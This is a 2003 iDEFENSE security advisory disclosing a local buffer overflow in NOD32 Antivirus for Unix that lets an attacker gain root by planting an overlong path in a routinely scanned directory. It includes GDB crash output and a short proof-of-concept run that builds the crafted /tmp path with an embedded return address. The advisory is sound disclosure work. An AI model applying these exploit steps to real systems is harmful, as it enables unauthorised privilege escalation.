-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
iDEFENSE Security Advisory 02.10.03:
http://www.idefense.com/advisory/02.10.03.txt
Buffer Overflow In NOD32 Antivirus Software for Unix
February 10, 2003
I. BACKGROUND
Eset Software's NOD32 Antivirus System is a cross-platform anti-virus
application. The Linux, FreeBSD, OpenBSD and NetBSD versions are compiled
from the same sources, which the vendor refers to as "nod32 for UNIX".
More information is available at http://www.nod32.com/products/unix.htm .
II. DESCRIPTION
Local exploitation of a buffer overflow in NOD32 for UNIX could allow
attackers to gain super-user (root) privileges. The overflow occurs when
NOD32 parses a path with a name of length greater than 500 characters
(/tmp/AAAAAβ¦AAA). An attacker can overwrite the first three bytes of
the eax and ecx registers, as can be seen from the following GDB output:
β¦
Program received signal SIGSEGV, Segmentation fault.
0x4207fa78 in strcmp () from /lib/i686/libc.so.6
(gdb) bt
#0 0x4207fa78 in strcmp () from /lib/i686/libc.so.6
#1 0x0804c2ba in scan_dir ()
#2 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb) info registers
eax 0x4141414c 1094795596
ecx 0x4141414c 1094795596
β¦
III. ANALYSIS
Exploitation allows local code execution with the privileges of the user
who spawned NOD32. This is possible by creating an exploit path and then
socially engineering a target user into scanning over the exploit path
using NOD32. If the attacker has write permissions to a directory that is
routinely scanned with NOD32 (such as /tmp), he or she can gain the
privileges of the scanning user (usually root).
Proof of concept exploit code has been written for the FreeBSD 4.7
platform. The following is a sample exploit run that should set up shell
code in an environment variable and spawn a shell under the privileges of
the user executing NOD32:
$ perl eggnod.pl
$ mkdir -p /tmp/`perl -e 'print "A" x 255'`/`perl -e 'print "B" x 240 .
"\xfc\xbf\xbf"'`
$ nod32 /tmp
IV. DETECTION
NOD32 Antivirus System for Unix version 1.012 and below is vulnerable.
V. VENDOR FIX
The latest version 1.013 fixes the issue and can be downloaded from
http://www.nod32.com
VI. CVE INFORMATION
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
assigned the identification number CAN-2003-0062 to this issue.
VII. DISCLOSURE TIMELINE
12/03/2003 Issue disclosed to iDEFENSE
01/28/2003 Eset Software notified ([email protected])
01/28/2003 iDEFENSE clients notified
02/03/2003 Response received from Palo Luka ([email protected])
02/10/2003 Coordinated Public Disclosure
VIII. CREDIT
Knud Erik HΡjgaard ([email protected]) discovered this vulnerability.
Get paid for security research
http://www.idefense.com/contributor.html
Subscribe to iDEFENSE Advisories:
send email to [email protected], subject line: "subscribe"
About iDEFENSE:
iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world β from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide
decision-makers, frontline security professionals and network
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com .
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0
iQA/AwUBPkgBffrkky7kqW5PEQIq/gCeMsnn0gKxpM25GI/QO673cEV7iAsAn15C
d5dxClPtqnk53TP0W2dmIJKS
=Smty
-----END PGP SIGNATURE-----